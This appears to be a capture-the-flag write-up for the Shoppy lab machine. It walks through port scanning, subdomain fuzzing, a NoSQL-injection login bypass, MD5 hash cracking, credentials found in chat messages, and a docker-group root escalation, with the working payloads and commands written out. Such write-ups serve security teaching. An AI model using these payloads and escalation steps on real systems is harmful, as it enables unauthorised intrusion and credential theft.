Scanning

> TARGET=10.129.180.36 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT STATE SERVICE VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title:             Shoppy Wait Page        
|_http-favicon: Unknown favicon MD5: D5F0A0ADD0BFBB2BC51607F78ECE2F57
|_http-server-header: nginx/1.23.1
9093/tcp open  copycat? syn-ack ttl 63

• Discovered shoppy.htb by browsing, add to /etc/hosts

Web enum

• Subdomain enum

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://shoppy.htb/" -H "Host: FUZZ.shoppy.htb" --hl 7

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000047340:   200        0 L      141 W      3122 Ch     "mattermost" 

• There is a login page at http://shoppy.htb/login, can be bypassed with a username as follow

admin'||''==='

• Fuzz the username field to find more user accounts

> wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -d "username=FUZZ'||''==='&password=test" --hh 51 http://shoppy.htb/login

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   302        0 L      4 W        28 Ch       "josh"

• Found weird page: http://shoppy.htb:9093/

Get hash of josh

• Login as josh using the bypass

josh'||''==='

• Search for user josh and export the hash

http://shoppy.htb/admin/search-users?username=josh
http://shoppy.htb/exports/export-search.json

[{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

• The hash can be cracked using hashcat

> hashcat -m 0 hash.txt rockyou.txt
remembermethisway

foothold

• Login to http://mattermost.shoppy.htb using the above credentials and browse the Development channel, found the following message to a user called jaeger

Hey @jaeger, when I was trying to install docker on the machine, I started learn C++ and I do a password manager. You can test it if you want, the program is on the deploy machine.

• Then, under the Deploy channel, the password for jager can be found

For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it. 

• Login via ssh as jaeger to fetch the user flag

root

• Check sudo rights

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

• Check the text of the this program and spot the following line, see the word Sample?

> cat /home/deploy/password-manager

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !

• Enter the master password and switch to deploy

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

• Upload linpeas and found a docker vulnerability and the user deploy also belongs to the docker group

[+] Analyzing .socket files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets                                                                                                
Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)                                    
Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)

• PE via this: https://gtfobins.github.io/gtfobins/docker/

deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)